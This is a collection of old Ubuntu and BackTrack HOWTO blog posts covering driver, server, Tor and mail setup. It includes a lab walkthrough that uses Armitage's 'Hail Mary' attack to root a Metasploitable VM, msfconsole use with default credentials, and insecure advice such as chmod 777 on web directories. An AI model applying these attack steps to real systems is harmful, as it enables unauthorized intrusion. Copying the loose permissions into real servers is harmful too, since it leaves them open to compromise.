sudo apt-get update

sudo apt-get upgrade

64-bit :

sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc nvidia-current-modaliases libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev  nvidia-current-dev nvidia-cuda-dev nvidia-kernel-common opencl-headers

32-bit :

sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc nvidia-current-modaliases lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev nvidia-kernel-common opencl-headers

Step 2a :

If you do not have any nVidia driver installed before, you need to do the following command. Otherwise, this step is not required at all.

sudo nvidia-xconfig

Step 3 :

Reboot your system.

Step 4 (Optional) :

To install SMPlayer.

sudo apt-get install smplayer smplayer-translations smplayer-themes

Then set it to use "vdpau" at "Output Driver" at "Preference".

Step 5 - Compiling of nVidia CUDA sample codes (Optional)

Some sample codes at gpucomputingsdk_4.0.13_linux.run cannot be compiled successfully. However, I would like to share how I compile some of them.

(a) Install the gupcomputingsdk with the following command and accepted the default setting that it provides.

sudo apt-get install freeglut3-dev libxi-dev libXmu-dev

Go to the following link :
http://developer.nvidia.com/cuda-toolkit-40#Linux

wget http://developer.download.nvidia.com/compute/cuda/4_0_rc2/sdk/gpucomputingsdk_4.0.13_linux.run

sudo chmod +x gpucomputingsdk_4.0.13_linux.run
sh gpucomputingsdk_4.0.13_linux.run

(b) Set the environment :

sudo nano /etc/environment

Append the following at the end of the entry.

:/usr/lib/nvidia-current:/usr/lib/nvidia-cuda-toolkit

source /etc/environment

(b1) Set LD_LIBRARY_PATH :

sudo nano /etc/ld.so.conf.d/cuda.conf

Append the following lines to the file.

/usr/lib/nvidia-current
/usr/lib/nvidia-cuda-toolkit

sudo ldconfig

(b2) Create a softlink of libcuda.so :

sudo ln -s /usr/lib/nvidia-current/libcuda.so /usr/lib/ sudo ln -s /usr/lib/nvidia-current/libcuda.so.1 /usr/lib/

(c) Make softlink to the /usr/include/thrust :

sudo mkdir /usr/lib/include

sudo ln -s /usr/include/thrust /usr/lib/include/

(c1) Add the path of new location of thrust to the common/common.mk :

sudo nano ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk

Go to line 64 and add "-I/usr/lib/include" :

Change from -
INCLUDES += -I. -I$(CUDA_INSTALL_PATH)/include -I$(COMMONDIR)/inc -I$(SHAREDDIR)/inc

Change to -
INCLUDES += -I. -I$(CUDA_INSTALL_PATH)/include -I/usr/lib/include -I$(COMMONDIR)/inc -I$(SHAREDDIR)/inc

(d) Compiling of the sample code :

cd NVIDIA_GPU_computing_SDK/C

make

The executable sample codes will be situated at ~/NVIDIA_GPU_Computing_SDK/C/bin/linux/release/

Run the sample codes as the following, e.g. nbody and deviceQuery :

./nbody
./deviceQuery

(e) According to the developer of the PPA, this issue ~~(Step 5(b) to Step 5(c1))~~ (Step 5(c) to Step 5(c1)) may be caused by the SDK itself and nvcc compiler. However, if you install the official SDK, there is no such problem.

***(f) The CUDA 4.0 PPA just updated today (April 26, 2011 GMT+8) and it solved the Step 5(b) to Step 5(b2) problem.

That's all! See you.

HOWTO : Undelete files and directories on Ubuntu

2011-04-21T18:12:00.002+08:00

extundelete is a utility that can recover deleted files from an ext3 or ext4 partition.

Hereby, I am going to show to how to compile and install this utility from source on Ubuntu 10.10. The current version of extundelete is 0.2.0 at this time of writing.

Step 1 :

sudo apt-get update

sudo apt-get upgrade

sudo apt-get install build-essential libtool e2fslibs-dev autoconf automake autotools-dev m4 e2fslibs e2fsprogs

wget http://sourceforge.net/projects/extundelete/files/extundelete/0.2.0/extundelete-0.2.0.tar.bz2/download

tar -xvjf extundelete-0.2.0.tar.bz2

cd extundelete-0.2.0

./autogen.sh

./configure

make

sudo make install

Step 1a : (Alternative)

If you want to generate a debian installable file instead of install from source, you can use this step.

sudo apt-get update

sudo apt-get upgrade

sudo apt-get install build-essential libtool e2fslibs-dev autoconf automake autotools-dev m4 e2fslibs e2fsprogs checkinstall

wget http://sourceforge.net/projects/extundelete/files/extundelete/0.2.0/extundelete-0.2.0.tar.bz2/download

tar -xvjf extundelete-0.2.0.tar.bz2

cd extundelete-0.2.0

./autogen.sh

./configure

make

sudo checkinstall

Follow the instruction on screen to complete the debian executable file generation.

sudo dpkg -i extundelete_0.2.0-1_amd64.deb
or
sudo dpkg -i extundelete_0.2.0-1_i386.deb

Step 2 :

Usage :

Help -
extundelete --help

To undelete test.png file at /dev/sda3 and /home/samiux -
extundelete /dev/sda3 --restore-file /home/samiux/test.png

To undelete test directory at /dev/sda3 and /home/samiux -
extundelete /dev/sda3 --restore-directory /home/samiux/test

To undelete all files and directories at /dev/sda3 -
extundelete /dev/sda3 --restore-all

That's all! See you.

HOWTO : Change mode of files and directories in batch

2011-04-19T12:34:00.000+08:00

To change the mode to 777 for all directories under /var/www/drupal.

sudo find /var/www/drupal/*/ -type d -exec chmod 777 {} \;

To drop the execution rights of the all files under /var/www.

sudo find /var/www -type f -exec chmod -x {} \;

That's all! See you.

HOWTO : Performance tuning on Ubuntu

2011-04-19T12:25:00.007+08:00

This tutorial can be applied to Desktop and Server. Make sure you have at least 512MB RAM on your system beofre doing so.

Step 1 :

sudo nano /etc/sysctl.conf

Append the following lines at the end of the file.

kernel.sem = 250 32000 100 128

kernel.shmall = 2097152

kernel.shmmax = 2147483648

kernel.shmmni = 4096

# If you have more than 512MB RAM, use this setting (uncomment it and comment the setting just below)

fs.file-max = 262140

# If you have 512MB RAM or less, use this setting

#fs.file-max = 65535

vm.swappiness = 1

vm.vfs_cache_pressure = 50

vm.min_free_kbytes = 65536



net.core.rmem_default = 33554432

net.core.rmem_max = 33554432

net.core.wmem_default = 33554432

net.core.wmem_max = 33554432

net.ipv4.tcp_rmem = 10240 87380 33554432

net.ipv4.tcp_wmem = 10240 87380 33554432

net.ipv4.tcp_no_metrics_save = 1

net.ipv4.tcp_window_scaling = 1

#net.ipv4.tcp_timestamps = 1

#net.ipv4.tcp_sack = 1

#net.core.netdev_max_backlog = 5000

#net.ipv4.tcp_mem = 786432 1048576 26777216

net.ipv4.ip_local_port_range = 1024 65535

net.ipv4.tcp_max_tw_buckets = 360000



net.ipv4.tcp_max_orphans = 3276800

net.ipv4.tcp_tw_reuse = 1

net.ipv4.tcp_tw_recycle = 1

net.ipv4.tcp_syn_retries = 2

net.ipv4.tcp_synack_retries = 2

net.core.somaxconn = 32768

net.core.netdev_max_backlog = 32768

net.ipv4.tcp_max_syn_backlog = 65536

net.ipv4.tcp_mem = 94500000 915000000 927000000

net.ipv4.tcp_timestamps = 0

net.ipv4.tcp_fin_timeout = 15

#net.ipv4.tcp_sack = 0

net.ipv4.tcp_orphan_retries = 2

net.ipv4.conf.all.accept_redirects = 0

net.ipv4.conf.default.accept_redirects = 0

net.ipv4.conf.all.secure_redirects = 0

net.ipv4.conf.default.secure_redirects = 0

net.ipv4.conf.all.log_martians = 1

net.ipv4.conf.default.log_martians = 1

net.ipv4.conf.all.accept_source_route = 0

net.ipv4.conf.default.accept_source_route = 0

net.ipv4.conf.all.rp_filter = 1

net.ipv4.conf.default.rp_filter = 1

net.ipv4.tcp_syncookies = 1

Save and perform the following command.

sudo /sbin/sysctl -p

Step 2 :

sudo nano /etc/rc.local

Insert the following lines just before "exit 0". This requires to reboot the system to make it works.

echo 1024 > /sys/block/sda/queue/read_ahead_kb

echo 256 > /sys/block/sda/queue/nr_requests

Step 3 :

To do the following step is in your own risk. It works for ext4 only.

sudo nano /etc/fstab

add "discard,norelatime,noatime" just before "errors=remount-ro" and "defaults".

If there is any problem or error when applying the commands, please do not reboot the system. Correct the problem or typo before reboot. Otherwise, your system cannot be reboot.

sudo mount -a

sudo mount -o remount /

Step 4 :

You can now reboot your system if there is no error at Step 3.

That's all! See you.

HOWTO : Latest Adobe Flash for 64-bit Ubuntu 10.10

2011-04-01T21:08:00.002+08:00

When you upgraded your Firefox to version 4 on your 64-bit Ubuntu as per this tutorial, you may find that the flash is operating abnormally. Now, we can fix this by installing the latest Flash from PPA.

As I do not have any 32-bit system, I do not know what happen to 32-bit when Firefox is upgraded to version 4.

Your 32-bit version of Flash will be uninstalled automatically from your 64-bit system.

sudo add-apt-repository ppa:sevenmachines/flash

sudo apt-get update

sudo apt-get install flashplugin64-installer

That's all! See you.

HOWTO : Upgrade to Firefox 4 on Ubuntu 10.10

2011-03-31T18:43:00.000+08:00

Firefox 4 is released recently. It also works on Ubuntu 10.10. You can upgrade it from PPA. Be keep in mind that some of the add-ons are not compatible with Firefox 4 at the moment.

sudo add-apt-repository ppa:mozillateam/firefox-stable

sudo apt-get update 

sudo apt-get upgrade

That's all! See you!

HOWTO : LibreOffice 3.3 on Ubuntu 10.10

2011-03-26T19:38:00.007+08:00

OpenOffice is now owned by Oracle. The development team of previous OpenOffice reformed and developed LibreOffice for the replacement. You can use LibreOffice as the alternative. LibreOffice is faster and more powerful.

Be keep in mind that OpenOffice will be uninstalled automatically when you install LibreOffice.

Step 1 :

sudo add-apt-repository ppa:libreoffice/ppa

sudo apt-get update

Step 2 :

sudo apt-get install libreoffice-gtk libreoffice-gnome libreoffice-pdfimport libreoffice-officebean libreoffice-ogltrans libreoffice-wiki-publisher libreoffice-core libreoffice-mysql-connector libreoffice-base-core libreoffice-style-andromeda libreoffice-calc libreoffice-draw libreoffice-impress libreoffice-writer libreoffice-math  libreoffice-common libreoffice-emailmerge libreoffice-l10n-common libreoffice-dtd-officedocument1.0 libreoffice-report-builder-bin libreoffice-style-hicontrast libreoffice-base libreoffice-java-common libreoffice-style-galaxy libreoffice-report-builder ttf-opensymbol libreoffice-presentation-minimizer libreoffice-style-crystal libreoffice-style-oxygen libreoffice-filter-mobiledev mozilla-libreoffice libreoffice-style-human libreoffice-style-tango python-uno ure uno-libs3 libreoffice-help-en-us

Step 3 : (Optional)

The following will install Traditional Chinese and Simplified Chinese.

sudo apt-get install libreoffice-l10n-zh-cn libreoffice-l10n-zh-tw libreoffice-help-zh-cn libreoffice-help-zh-tw

Step 4 : (Optional)

If you are using Kubuntu, install the following instead of libreoffice-gnome and libreoffice-gtk.

sudo apt-get install libreoffice-kde

That's all! See you.

HOWTO : Third Party Modules for Drupal 6

2011-03-24T19:35:00.004+08:00

The following list is my currently using third party modules of Drupal 6.2. I would like to share with you all.

Download the following modules with the following url and put them at sites/all/modules/contribute/.

http://www.drupal.org/project/????

Where ???? is the following titles

e.g. http://www.drupal.org/project/acl



acl



# The following are for Google Adsense

adsense

adsense_injector



advanced_forum

advanced_forum_more_styles

advanced_help

advuser

author_pane

backup_migrate

bookmark_us

browscap

cck

composite

content_access

ctools

date

db_maintenance

emfield

fb

fckeditor

filefield

formblock

getid3

google_analytics

htmlmail

i18n

imageapi

imagecache

imagefield

jquery_ui

lang_dropdown

languageicons

lightbox2

login_security

media_youtube

mimemail

mobile_tools

mollom

mp3player



# The following are for online shop

nap

node_access_rebuild_bonus



options_element

panels

pathauto

phone

phpmailer

print

private

privatemsg

rules

security_review

select_or_other

signup

simpletest

sina_open

sitedoc

skinr

tablefield

theme_editor

token



# The following are for online shop

ubercart

uberpos

uc_addresses

uc_alipay

uc_coupon

uc_node_access

uc_node_checkout

uc_product_triggers

uc_views



user_delete

user_register_notify

views

views_bulk_operations

webform

webform_validation

wurfl



# The following are themes for mobile_tools

fusion

fusion_mobile

By the way, if you want to tune the Drupal 6, MySQL and PHP5 as well as Hiawatha, please refer to Performance tuning and Installation of Hiawatha and Drupal.

That's all! See you.

HOWTO : Drupal 6.2 or 7 with Hiawatha 7.4 WebServer on Ubuntu Server/Desktop 10.10

2011-02-21T01:35:00.006+08:00

I am going to setup a development environment of Drupal 6.2 or 7 with Hiawatha 7.4 on Ubuntu Desktop 10.10. However, this setting is also suit for production environment on Ubuntu Server 10.10 with a little bit changing.

Step 0 - Installation of Hiawatha

Follow this link to install required packages. You can omit the optional security settings at the moment.

Step 1 - Configuration of Hiawatha

Change the following section to the /etc/hiawatha/hiawatha.conf.

Binding {

   Port = 80

   #Interface = 127.0.0.1

   MaxKeepAlive = 30

   TimeForRequest = 3,20

   MaxRequestSize = 8192

   MaxUploadSize = 30

}

Add the following section to the /etc/hiawatha/hiawatha.conf.

UrlToolkit {

   ToolkitID = drupal7

   RequestURI exists Return

   Match /favicon.ico Return

   Match .* Rewrite /index.php

}

or/and

UrlToolkit {

   ToolkitID = drupal6

   RequestURI exists Return

   Match ^/favicon.ico$ Return

   Match /(.*)\?(.*) Rewrite /index.php?q=$1&$2

   Match /(.*) Rewrite /index.php?q=$1

}

Step 2 - Configuration of virtual host

sudo nano /etc/hiawatha/enable-site/drupal7

Drupal 7 :

VirtualHost {

   Hostname = localhost, 127.0.0.1

   WebsiteRoot = /var/www/drupal7

   StartFile = index.php

   SecureURL = false

   AccessLogfile = /var/log/hiawatha/access.log

   ErrorLogfile = /var/log/hiawatha/error.log

   TimeForCGI = 120

   #UseFastCGI = PHP5

   UseToolkit = drupal7

   #DenyBody = ^.*%3Cscript.*%3C%2Fscript%3E.*$

   ExecuteCGI = yes

   PreventCSRF = yes

   PreventSQLi = yes

   PreventXSS = yes

   TriggerOnCGIstatus = no

}

or

sudo nano /etc/hiawatha/enable-site/drupal6

Drupal 6 :

VirtualHost {

   Hostname = localhost, 127.0.0.1

   WebsiteRoot = /var/www/drupal6

   StartFile = index.php

   SecureURL = false

   AccessLogfile = /var/log/hiawatha/access.log

   ErrorLogfile = /var/log/hiawatha/error.log

   TimeForCGI = 120

   #UseFastCGI = PHP5

   UseToolkit = drupal6

   #DenyBody = ^.*%3Cscript.*%3C%2Fscript%3E.*$

   ExecuteCGI = yes

   PreventCSRF = yes

   PreventSQLi = yes

   PreventXSS = yes

   TriggerOnCGIstatus = no

}

Step 2a :

sudo /etc/init.d/hiawatha restart

Step 3 : Preparation of installation of Drupal

Download the Drupal from her official site. Extract the downloaded file and copy to /var/www/.

sudo tar -xzvf drupal-6.20.tar.gz

or

sudo tar -xzvf drupal-7.0.tar.gz

Step 3a :

Create a directory under /var/www/.

sudo mkdir /var/www/drupal6

or

sudo mkdir /var/www/drupal7

Step 3b :

Copy the files to the /var/www/.

sudo cp ~/drupal-6.20/* /var/www/drupal6

or

sudo cp ~/drupal-7.0/* /var/www/drupal7

Step 3c :

cd /var/www/drupal6

or

cd /var/www/drupal7

Step 3d :

sudo chmod a+w sites/default

sudo mkdir sites/default/files

sudo chmod a+w sites/default/files

sudo cp sites/default/default.settings.php sites/default/settings.php

sudo chmod a+w sites/default/settings.php

Step 3e :

mysql -u root -p

After entered the password, create a database for the installation.

create database drupal;

After that, then quit MySQL.

quit

Step 3f :

Open the browser and type "localhost" at the address field to continue the installation. The database name is "drupal".

When the installation is completed, carry out the following commands.

sudo chmod go-w sites/default

sudo chmod go-w sites/default/settings.php

sudo chmod a-r CHANGELOG.txt

Step 4 : Complete the installation

Drupal 6.2

sudo crontab -e

Add the following :

0 * * * * wget -O - -q -t 1 http://localhost/cron.php

or

Drupal 7

Administration -- Configuration -- System -- Cron

Get the Cron key at Administration -- Reports -- Status report -- Cron maintenance tasks.

sudo crontab -e

0 * * * * wget -O - -q -t 1 http://localhost/cron.php?cron_key=YOURKEY

Step 5 : Localization (Optional)

Download the required localization .po file at the following links.

http://localize.drupal.org/download
http://drupal.org/localize

That's all! See you.

HOWTO : CakePHP 1.3.7 and Hiawatha 7.4 on Ubuntu Desktop 10.10

2011-02-13T14:57:00.006+08:00

This tutorial shows you how to configure a development environment of CakePHP on Ubuntu Desktop 10.10. It can also be used in production for Ubuntu Server 10.10.

Step 0 :

Follow this link to install Hiawatha 7.4 on Ubuntu Desktop 10.10. The security options can be skipped.

Step 0a :

sudo nano /etc/hiawatha/hiawatha.conf

Add the following to "hiawatha.conf".

UrlToolkit {

   ToolkitID = cakephp

   Match ^/app/webroot/ Skip 2

   Match ^/app/(.*) Rewrite /$1 Continue

   Match ^/(.*) Rewrite /app/webroot/$1 Continue

   RequestURI exists Return

   Match (.*)\?(.*) Rewrite $1&$2 Continue

   Match ^/app/webroot/(.*) Rewrite /app/webroot/index.php?url=$1

}

UrlToolkit {

   ToolkitID = cakephp_apps

   Match ^/webroot/ Skip 2

   Match ^/(.*) Rewrite /$1 Continue

   Match ^/(.*) Rewrite /webroot/$1 Continue

   RequestURI exists Return

   Match (.*)\?(.*) Rewrite $1&$2 Continue

   Match ^/webroot/(.*) Rewrite /webroot/index.php?url=$1

}

Step 0b :

sudo nano /etc/hiawatha/enable-sites/mysite

VirtualHost {

   Hostname = localhost, 127.0.0.1

   WebsiteRoot = /var/www/mysite

   StartFile = index.php

   AccessLogfile = /var/log/hiawatha/access.log

   ErrorLogfile = /var/log/hiawatha/error.log

   TimeForCGI = 15

   #UseFastCGI = PHP5

   UseToolkit = cakephp_apps

   DenyBody = ^.*%3Cscript.*%3C%2Fscript%3E.*$

   ExecuteCGI = yes

   PreventCSRF = yes

   PreventSQLi = yes

   PreventXSS = yes

}

Step 1 :

Install CakePHP for github.
sudo apt-get install git

cd /var/www

sudo git clone https://github.com/cakephp/cakephp.git

Step 1a :

sudo nano /etc/environment

Add the following to the end of the line, but within in the " ".

:/var/www/cakephp/cake/console

Step 1b :

. /etc/environment

To see if the captioned path is included or not :

echo $PATH

Step 2 :

Create databases and tables according to your project requirement.

mysql -u root -p

When done, type the following :

quit

Step 3 :

cd /var/www

sudo su

cake bake project myproject

Follows the instruction on the screen.

cd /var/www/myproject

cake bake model all

cake bake controller all

cake bake view all

Exit from the root.
exit

Step 4 :

cd /var/www/myproject/config

sudo cp database.php.default database.php

Change the "login", "password" and "database" accordingly to the MySQL root and password as well as database that you just created.

Step 5 :

Now you can open Firefox to browse your application by typing "localhost" at the address field.

Step 6 :

To configure localization for the application.

sudo apt-get install libwxgtk2.8-dev libwxbase2.8-0 wx-common wx2.8-headers libwxgtk2.8-0

Go to http://www.poedit.net to download the current version 1.4.6.1.

tar -xvzf poedit-1.4.6.1.tar.gz

cd poedit-1.4.6.1

./configure

make

sudo make install

Reboot your computer when necessary.

Step 6a :

cd /var/www/myproject

sudo su

cake i18n

Select "E" and follows the instruction on screen. Then, select "I".

Now, a "default.pot" file is created at the /var/www/myproject/locale.

Exit from the root.
exit

Execute "poedit" and open the file "default.pot". Translate the content to Traditional Chinese and then save to "default.po". A "default.mo" will also be created.

Step 6b :

sudo mkdir /var/www/myproject/locale/zh_TW
sudo mkdir /var/www/myproject/locale/zh_TW/LC_MESSAGES

sudo cp /var/www/myproject/locale/default.* /var/www/myproject/locale/zh_TW/LC_MESSAGES/

Step 6c :

cd /var/www/myproject/config
sudo nano core.php

Append the following line to the core.php :

Configure::write('Config.language', 'zh_TW');

Restart Hiawatha :
sudo /etc/init.d/hiawatha restart

For example :
Open the browser and type "localhost/users", the content will be changed to Traditional Chinese.

*Where "users" is a Controller and table of a database that you just create. "users" is just an example.

That's all! See you.

HOWTO : Tor on Back|Track 4 R2

2011-01-26T15:07:00.000+08:00

Step 1 :

Make sure tor and privoxy are installed.

apt-get install tor privoxy

Step 2 :

nano /etc/privoxy/config

Append the following line to the file.

forward-socks4a / localhost:9050 .

Step 3 :

/etc/init.d/privoxy start

/etc/init.d/tor start

Step 4 :

Install tor button on firefox

https://addons.mozilla.org/zh-TW/firefox/addon/torbutton/

Go to Tor Button perference and set as the following.

Select "Use custom proxy settings"

HTTP Proxy : 127.0.0.1  Port : 8118

SSL Proxy : 127.0.0.1  Port : 8118

SOCKS host : 127.0.0.1  Port : 9050

Step 5 :

Click on the "Tor enable" at the right bottom of the Firefox to enable the Tor Button.

Hints : You should repeat the Step 3 and Step 5 when you are using Tor to surf the internet next time.

That's all! See you.

HOWTO : Traditional Chinese support on Back|Track 4 R2

2011-01-22T02:14:00.003+08:00

Back|Track 4 R2 is an English based Linux distribution. The Firefox cannot browse Traditional Chinese webpages properly. This tutorial shows you how to make Back|Track 4 R2 to recognize Traditional Chinese characters on Firefox.

Open the terminal and key in the following :

apt-get install language-support-zh language-support-fonts-zh language-support-input-zh language-support-translations-zh language-pack-zh language-pack-zh-base language-pack-kde-zh language-pack-kde-zh-base kde-l10n-zhtw

After the installation, reboot your system.

That's all! See you.

HOWTO : GoDaddy.com and Google Apps (Email) with your Domain

2010-12-22T03:58:00.002+08:00

You can use GMail web mail service with your domain name, such as yourname@yourdomain.com on www.gmail.com.

Follow this link to set up Postfix to use GMail as your SMTP server.

Step 0 :

Apply of free Google Apps (Free) Email :

Google Apps (Free) Email

Step 1 :

Create the MX record at your domain automatically.

Create the MX record at your domain manually.

The MX record are :

ASPMX.L.GOOGLE.COM

ALT1.ASPMX.L.GOOGLE.COM

ALT2.ASPMX.L.GOOGLE.COM

ASPMX2.GOOGLEMAIL.COM

ASPMX3.GOOGLEMAIL.COM

Step 1a :

Create a SPF record

Step 2 :

You will receive a email from Google and ask you to create a adminstrator account with your domain name. Your domain name needs to be authorized to use Google Apps. You should follow the instructions to complete the process.

After that, you can you GMail as your domain's email.

Step 3 (Optional) :

If you are using Untangle as gateway and IPS, you should do the following :

Open a browser and point to Untangle web page as well as login.

Config/Networking/Hostname

Change the following settings :

From -
Hostname : untangle.mydomain.com

To -
Hostname : untangle.mydomain.local

Step 3a (Optional) :

Config/Email/Outging Email Server (SMTP)

Change the following settings :

Send Email using the specified SMTP Server

- Server Address or Hostname : <postifx server IP address>

- Server Port : 25

Known issue

Cannot send to yourself with your domain, e.g. yourname@yourdomain.com via Untangle.

That's all! See you.

HOWTO : Send Mail to GMail by Postfix on Ubuntu Server 10.10

2010-12-22T03:55:00.001+08:00

You cannot send any mail to GMail from you mail server, unless you set GMail server as your SMTP server.

Step 0 :

Install the Ubuntu Server 10.10 and select Mail Server when install.

Step 1 :

sudo nano /etc/postfix/transport

Append the following line.

* smtp:[smtp.gmail.com]:587

Step 2 :

sudo nano /etc/postfix/sasl/sasl_passwd

Append the following line.

[smtp.gmail.com]:587 samiux@gmail.com:password

Step 3 :

sudo nano /etc/postfix/main.cf

Add or make the change of the following lines.

relayhost = [smtp.gmail.com]:587

smtp_sasl_auth_enable = yes

smtp_sasl_password_maps = hash:/etc/postfix/sasl/sasl_passwd

smtp_sasl_security_options = noanonymous

smtp_tls_CAfile = /etc/postfix/cacert.pem

smtp_use_tls = yes

mynetworks = 192.168.0.0/24 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128

Step 4 :

cat /etc/ssl/certs/Thawte_Premium_Server_CA.pem | sudo tee -a /etc/postfix/cacert.pem

Step 5 :

sudo postmap /etc/postfix/transport

sudo postmap /etc/postfix/sasl/sasl_passwd

Step 6 :

sudo /etc/init.d/postfix restart

That's all! See you.

HOWTO : Faster Firefox

2010-12-16T16:24:00.002+08:00

The following steps are for broadband users who are using Firefox and wish it is running more faster.

Step 0 :

Open Firefox and type the following at the address field.

about:config

Step 1 :

Change the following value from "false" to "true" :

network.http.pipelining

network.http.proxy.pipelining

Step 2 :

Change the following value from "4" to "30" :

network.http.pipelining.maxrequests

Step 3 :

At any browsing area of the browser, add the following string with a value of "0" :

nglayout.initialpaint.delay

Step 4 :

Restart Firefox. Now, you can browse the web pages more faster.

That's all! See you.

HOWTO : No skill hacking with Armitage on Back|Track 4 R2

2010-12-16T10:39:00.007+08:00

*** WARNING : This tutorial is for education purpose only.  It alert you to update your system once there is any patch or update available.  Please do not hack any website, computer and/or network without authorization.  Otherwise, you will be put into the jail. ***

Prerequisites

In order to complete this tutorial, you should have an Ubuntu or Windows system as host. Back|Track 4 R2 and Metasploitable as clients on VirtualBox 3.2.

You can download Back|Track 4 R2 at here and Metasploitable at here. Metasploitable is an Ubuntu Server 8.04 that installed some applications with flaws that can be exploited.

The installation of Back|Track 4 R2 is here.

The network interfaces of Back|Track 4 R2 on VirtualBox 3.2 are "NAT and "Host Only (vboxnet0)". The network interface of Metasploitable is "Host Only (vboxnet0)".

The Armitage should be installed on Back|Track 4 R2 and the tutorial is here.

Step 0 :

Run the Metasploitable on VirtualBox first. The IP address should be 192.168.56.101. The run Back|Track 4 R2 on VirtualBox the next and the IP address should be 10.x.x.x of eth0.

Step 1 :

On the Back|Track 4 R2, run the following command to make sure eth0 and eth1 are up and have their IPs.

/etc/init.d/networking restart

Step 2 :

Run the following commands to launch Armitage.

/etc/init.d/mysql start

cd /pentest/exploits/armitage

./armitage.sh

Step 3 :

Select "Use SSL" and click "Start MSF".

Then, "Using database driver mysql" message box will be displayed. Click "OK".

Step 4 :

Select "Host" -- "Nmap Scan" -- "Intense Scan, all TCP ports"

Wait for the scanning complete.

Step 5 :

Select "Attacks" -- "Find Attacks" -- "by port".

Wait for the scanning complete.

Step 6 :

Select "Attacks" -- "Hail Mary" -- "by port".

Wait for the "Monitor" image to change to red colour. If so, the target is exploited. Then, right click on the "Monitor" image and select "Shell". To check if the target is privilege escalated by issuing "whoami" on the Shell. If it shows "root", you are successfully owned the target.

That's all! See you.

HOWTO : The Onion Router (Tor) on Ubuntu 10.10 Desktop

2010-12-08T05:23:00.004+08:00

Tor Overview

Step 1 :

sudo nano /etc/apt/sources.list

Append the following line to the file :

deb http://deb.torproject.org/torproject.org lucid main

Save and exit. Then add the key :

gpg --keyserver keys.gnupg.net --recv 886DDD89

gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

Install tor.

sudo apt-get install tor

Step 2 :

Install Privoxy.

sudo apt-get install privoxy

Edit the configure file of privoxy.

sudo nano /etc/privoxy/config

Append the following line.

forward-socks4a / localhost:9050 .

Step 2a (Optional) :

If you are behind firewall or NAT as well as router, you should append the following line at the configure file.

forward 192.168.*.*/ .

Step 3 :

Made sure Tor is working.

sudo /etc/init.d/privoxy start

sudo /etc/init.d/tor start

netstat -a | grep 9050

If the output is similar to the following line, your Tor is working.

tcp 0 0 localhost:9050 *:* LISTEN

Step 4 :

Get "TorButton" addon for Firefox. Then enable/disable it by Ctrl+2.

Step 5 :

You can confirm the Tor is working on the remote side by visiting the following site.

check.torproject.org

Step 6 (Optional) :

If the System start/stop links do not exist, please issue the following commands :

sudo update-rc.d privoxy defaults

sudo update-rc.d tor defaults

Reference

Tor Project
TorButton
WiKi of Tor

That's all! See you.

HOWTO : Adaptec RAID 2405 on Ubuntu 10.10 Desktop

2010-11-29T16:18:00.000+08:00

Adaptec RAID 2405 is a 0, 1, 10 Hardware RAID card.

The Adaptec Storage Manager is also working very well on Ubuntu 10.10. The current version of the Adaptec Storage Manager is v6.5-18579 which is dated August 25, 2010.

The User's Guide can be download at here

This tutorial shows you how to install Adaptec Storage Manager on Ubuntu 10.10 Desktop.

Step 1 :

Download the Adaptec Storage Manager, extract and install. Let's 64-bit for example.

tar -xzvf asm_linux_x64_v6_50_18579.tgz

cd manager

sudo apt-get install alien

alien --scripts StorMan-6.50.x86_64.rpm

sudo dpkg -i storman_6.50-18580_amd64.deb

Step 2 :

Run the Manager by issuing the following command :

sudo /usr/StorMan/StorMan.sh

The username and password is the username and password of your Ubuntu 10.10 Desktop (sudoer account).

Remarks : The installation for Adaptec RAID 5805 is similar.

That's all! See you.

HOWTO : Information gathering with Dradis on Back|Track 4 R2

2010-11-25T11:34:00.002+08:00

Dradis is an effective information sharing tool. It is pre-installed in Back|Track 4 R2.

Step 1 :

Setting up Dradis server.

cd /pentest/misc/dradis/server

ruby ./script/server

Open your browser and the address is "https://localhost:3004". Accepted the certificate. Enter your password twice. Then, login to the system with your desired username and the previous password.

Or, you can use the default username and password, they are "etd" and "dradis" respectively.

Step 2 :

Setting up Dradis client.

nano /pentest/misc/dradis/client/conf/dradis.xml

Locate the following lines.

<option name='restful_user' value='etd'/>

<option name='restful_password' value='dradis'/>

Change the default value of "etd" and "dradis" according to the Step 1 above when necessary.

cd /pentest/misc/dradis/client

ruby ./dradis.rb

A "dradis>" prompt will be displayed.

Step 3 :

Start MySQL. Open a new terminal and execute the following commands :

/etc/init.d/mysql start

msfconsole

At the "msf>" prompt, enter the following :

db_driver mysql

db_connect root:toor@127.0.0.1/msf3

load db_tracker

Then, scan the port of the target "192.168.56.101" with NMap.

nmap -v -sV 192.168.56.101 -oA subnet_1

db_import subnet_1.xml

Now, you can issue the following commands to inspect the result :

db_host

db_services

Step 4 :

Go back to the terminal where it has the "dradis>" prompt. Issue the following command :

import nmap /root/subnet_1.gnmap grepable

Then, go back to the browser and refresh. You will see the data has been imported.

Reference

How to use Dradis

That's all! See you.

HOWTO : RTL8191SE wireless card on Back|Track 4 R2

2010-11-25T10:32:00.005+08:00

Lenovo ThinkPad X100e (Type 3508-65B) is equipped with AMD Athlon Neo MV-40 CPU and Realtek RTL8191SEvB wireless LAN Controller. It is working perfectly on Ubuntu 10.04 and 10.10. However, the wirelss card does not work on Back|Track 4 R2 (which is believed to be Ubuntu 8.04 with newer kernel). In additon, Back|Track 4 R2 is installed with Wicd as network manager.

This tutorial is going to show you how to install the r8191se_pci wireless driver on Back|Track 4 R2.

Step 1 :

Download the official Linux driver from Realtek. The current version is 0018 dated 2010-Oct-25 at the time of this writing.

Download Linux driver at RTL8191SE-VA2 section.

Step 2 :

Extract and compile the driver as well as copy the firmware the workable directory.

tar -xzvf rtl8192se_linux_2.6.0019.1207.2010.tar.gz

cd rtl8192se_linux_2.6.0019.1207.2010

make

make install

cp -Ra ~/rtl8192se_linux_2.6.0019.1207.2010/firmware/RTL8192SE/ /lib/firmware

Step 3 :

Load the driver.

depmod -a

modprobe r8192se_pci

ifconfig wlan0 up

or, reboot the system.

Step 4 :

Go to "Menu" -- "Internet" -- "Wicd Network Manager".

Select "Preference". Add "wlan0" to "Wireless interface".

